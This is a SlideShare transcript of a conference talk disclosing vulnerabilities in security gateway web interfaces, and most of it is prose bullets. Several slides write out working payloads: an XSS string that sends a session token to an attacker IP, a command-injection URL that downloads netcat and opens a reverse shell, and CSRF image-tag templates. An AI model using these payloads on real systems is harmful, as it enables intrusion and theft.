SlideShare une entreprise Scribd logo

They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

M
michelemanzotti
Technologie
1  sur  41
Télécharger pour lire hors ligne
They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
Introduction §  35+ Exploits found and reported to vendors of Security Gateways since October 2011 §  Many are serious issues which can lead an external attacker to compromise the Gateway §  Owning the Gateway can be quick, and powerful… as I will show you…
Which kind of products? §  Security Gateways -  Multifunction Security Gateways -  Email and Web filtering §  Appliances and Software §  Some examples include: -  ClearOS, Untangle, McAfee, Proofpoint, Barracuda -  Websense, Symantec (Brightmail)
How are they deployed?
What do they look like? Screenshots removed for slides
My Exploit Research method §  Find vendor site, sign-up §  Download product evaluation -  get eval-key (30 days) §  Install VM and snapshot §  “Blast it” with automated scanners §  Prod and poke it with Burp -  (majority of time) §  SSH as root for whitebox testing §  Create/test exploits §  Log and report exploits
Common vulnerabilities found §  Input-validation issues (90% of products) -  XSS, command-injection, SQLi, parameter-tampering §  Predictable URLs & parameters = CSRF §  Excessive privileges §  Various session-management issues §  Authentication bypass and information- disclosure §  Out-of-date software, default configs/ content §  Brute force password guessing -  (too basic but lots of it)
Attack stages §  Phase one: -  Gaining access to the UI §  Phase two: -  Gaining access to the operating- system
Interesting examples 1 §  ClearOS -  Information disclosure
Video removed for slides
Video removed for slides
Recap – UI ownage
Video removed for slides
Recap – Root shell and pivoting
Post exploitation §  It’s common for useful tools to be already installed -  gcc -  tcpdump -  netcat -  Nmap -  Perl/Python -  yum/apt-get -  stunnel §  File-system frequently not “hardened” -  No SELinux
Other session-token disclosure Screenshots removed for slides
More session-tokens – bypassing cookie security §  Bypass cookie security flags (Http-Only) §  Session-token reflected on a page with XSS = Pull session–token out of the DOM, send to attacker https://192.168.1.42:9999/xxxx? xxxx=SrvCtrl&method=get&cmd=listtags&s erver=<img src=nothing onerror='document.write("<img src= "http://192.168.1.50/"+ (document.firstChild.innerHTML.substr(312,2 4)) + """)'>
Attack scenarios §  Direct access to the Security Gateway UI -  Auth-bypass, session-hijacking, information-disclosure §  No direct access to the UI -  CSRF, XSS -  (Requires reconnaissance, and interaction with users) -  Special case of CSRF -  OSRF with out-of-band XSS
CSRFing Website users <html> <img src=" http://www.example.com/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
CSRFing Home routers <html> <img src=" http://192.168.1.254:81/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
CSRFing Corporate Security Gateways Attacker Victim
Interesting examples 2 §  Websense -  Unauthenticated command-injection as SYSTEM -  Advanced CSRF
Reverse shell from single URL https://192.168.1.42:xxxx/xxxx?xxxx=echo  .pdf%26echo  strUrl  %3d  ^"http:^"  %2b   chr(47)  %2b  chr(47)  %2b  ^"192.168.233.11^"  %2b  chr(47)  %2b  ^"nc.exe^">  http.vbs %26echo  StrFile  %3d  ^"nc.exe^"  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DEFAULT  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PRECONFIG  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DIRECT  %3d  1  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PROXY  %3d  2  >>  http.vbs%26echo  Dim  http,  varByteArray,   strData,  strBuffer,  lngCounter,  fs,  ts  >>  http.vbs%26echo      Err.Clear  >>  http.vbs %26echo      Set  http  %3d  Nothing  >>  http.vbs%26echo      Set  http  %3d   CreateObject(^"WinHttp.WinHttpRequest.5.1^")  >>  http.vbs%26echo      If  http  Is   Nothing  Then  Set  http  %3d  CreateObject(^"WinHttp.WinHttpRequest^")  >>  http.vbs %26echo      If  http  Is  Nothing  Then  Set  http  %3d   CreateObject(^"MSXML2.ServerXMLHTTP^")  >>  http.vbs%26echo      If  http  Is  Nothing   Then  Set  http  %3d  CreateObject(^"Microsoft.XMLHTTP^")  >>  http.vbs%26echo       http.Open  ^"GET^",  strURL,  False  >>  http.vbs%26echo      http.Send  >>  http.vbs%26echo     varByteArray  %3d  http.ResponseBody  >>  http.vbs%26echo      Set  http  %3d  Nothing  >>   http.vbs%26echo      Set  fs  %3d  CreateObject(^"Scripting.FileSystemObject^")  >>   http.vbs%26echo      Set  ts  %3d  fs.CreateTextFile(StrFile,  True)  >>  http.vbs%26echo       strData  %3d  ^"^"  >>  http.vbs%26echo      strBuffer  %3d  ^"^"  >>  http.vbs%26echo      For   lngCounter  %3d  0  to  UBound(varByteArray)  >>  http.vbs%26echo              ts.Write  Chr(255   And  Ascb(Midb(varByteArray,lngCounter  %2b  1,  1)))  >>  http.vbs%26echo      Next  >>   http.vbs%26echo      ts.Close  >>  http.vbs%26http.vbs%26nc.exe  192.168.233.11  443  -­‐e   cmd.exe|  
But how to exploit it?
Problems with CSRFing internal products from outside §  Who is the admin? §  How do you get the admin to click something malicious whilst logged- in? §  Product-UI port locked down to specific users? §  Don’t know internal IP address of the product in advance?
Ways to find DMZ IP addresses §  From SMTP relays bounced messages §  Misconfigured Web servers
CSRF a whole subnet <html> <img src= http://192.168.1.1:xxxx/...etc... <img src= http://192.168.1.2:xxxx/...etc... <img src= http://192.168.1.3:xxxx/...etc... <img src= http://192.168.1.4:xxxx/...etc... <img src= http://192.168.1.5:xxxx/...etc... <img src= http://192.168.1.6:xxxx/...etc... <img src= http://192.168.1.7:xxxx/...etc... ...etc...
Use the browser (and proxy)
There’s no place like localhost §  127.0.0.1 §  127.0.0.2 §  There are millions of ways of representing localhost, that the browser will not spot, and will send to the proxy, but the proxy will treat as localhost
CSRF proxy attack
Proxy-killer <html> <img src= http://127.0.0.2:xxxx/...etc... </html>
Did you understand that?
Interesting examples 3 §  Proofpoint  (video/demo)   -­‐  Enumerate  email  addresses -­‐  OSRF  via  email  
Video removed for slides
Video removed for slides
Video removed for slides
Recap – UI ownage via OSRF
Spot the problem
Conclusion §  Exploiting Security Gateway products offers powerful positions for an attacker §  Wide range of issues, some very serious -  Some easy to find, some harder §  Most techniques used are several years old §  I feel there is a big knowledge gap between secure website development and secure UI development
Further research §  This is a rich area for exploit- development -  35+ Exploits found so far in Security Gateways (just takes time) -  Lots of similar products vulnerable to similar attacks §  Other types of product -  Daniel Compton – Similar project but for Network-Monitoring software ~ 35+ exploits so far -  I’ve started looking at SSL VPNs
Questions and suggestions §  Whitepaper available at BlackHat EU §  Company Website: http://www.ngssecure.com §  Personal Blog: http://insidetrust.blogspot.com §  QUESTIONS?

Recommandé

In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
SecuRing
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
kosborn
 

Recommandé

In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
SecuRing
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
kosborn
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat Security Conference
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
drewz lin
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
End to end web security
End to end web securityEnd to end web security
End to end web security
George Boobyer
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky servers
Axilis
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
Yan Cui
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
levigross
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
nyccamp
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
drewz lin
 
WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
lpilorz
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
Mike Saunders
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
michelemanzotti
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
michelemanzotti
 

Contenu connexe

Tendances

[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat Security Conference
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
drewz lin
 
End to end web security
End to end web securityEnd to end web security
End to end web security
George Boobyer
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
Yan Cui
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
levigross
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
drewz lin
 

Tendances (20)

[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky servers
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 

En vedette

Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
michelemanzotti
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
michelemanzotti
 
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
DefconRussia
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
michelemanzotti
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
michelemanzotti
 
GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun
michelemanzotti
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
michelemanzotti
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentation
michelemanzotti
 

En vedette (9)

Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
 
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
 
GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentation
 

Similaire à They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
jaxconf
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 

Similaire à They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
1.3. (In)security Software
1.3. (In)security Software1.3. (In)security Software
1.3. (In)security Software
 
How to use shodan more powerful
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Hacking identity: A Pen Tester's Guide to IAM
Hacking identity: A Pen Tester's Guide to IAMHacking identity: A Pen Tester's Guide to IAM
Hacking identity: A Pen Tester's Guide to IAM
 
DevSecOps - automating security
DevSecOps - automating securityDevSecOps - automating security
DevSecOps - automating security
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
Day8
Day8Day8
Day8
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 

Dernier

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 

Dernier (20)

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
